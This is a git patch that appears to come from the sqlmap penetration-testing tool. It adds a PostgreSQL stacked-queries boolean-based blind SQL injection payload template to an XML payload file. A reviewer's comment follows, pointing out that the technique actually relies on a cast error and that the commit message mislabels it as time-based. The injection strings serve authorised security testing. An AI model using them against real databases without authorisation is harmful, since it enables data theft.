From 423a34c9f3238b54e874c1e372bc8c3e7af994d1 Mon Sep 17 00:00:00 2001 From: Timo Boettcher Date: Thu, 5 Oct 2017 23:58:29 +0200 Subject: [PATCH] Add boolean-blind for postgreql in stacked-queries The patch is based on time-based blind exploitation --- xml/payloads/boolean_blind.xml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/xml/payloads/boolean_blind.xml b/xml/payloads/boolean_blind.xml index 114097cf7..4099a01f8 100644 --- a/xml/payloads/boolean_blind.xml +++ b/xml/payloads/boolean_blind.xml @@ -525,6 +525,27 @@ Tag: + + PostgreSQL > 8.1 stacked queries (comment) - boolean-based blind + 1 + 1 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END) IS NULL + +
+ PostgreSQL + > 8.1 +
+
+ Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 1
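Review bot: The added PostgreSQL entry is labelled boolean-based blind, but its vector, payload and comparison lines tell true from false only through `CAST('[RANDSTR]' AS NUMERIC)` failing inside the stacked SELECT, and the entry does not document that. The commit message also calls the patch "based on time-based blind exploitation" although no delay appears anywhere in the hunk, so it should be reworded to match. I would add a comment above the entry such as `<!-- false branch forces a NUMERIC cast error in the stacked SELECT; the result is inferred from whether that error changes the response -->`. If the application swallows errors from the second statement, the two branches presumably look the same, so a negative result from this test alone should not be read as "not injectable". For log review, each false-branch probe should leave a numeric-conversion error on a random string in the PostgreSQL log, and the comment could note that too.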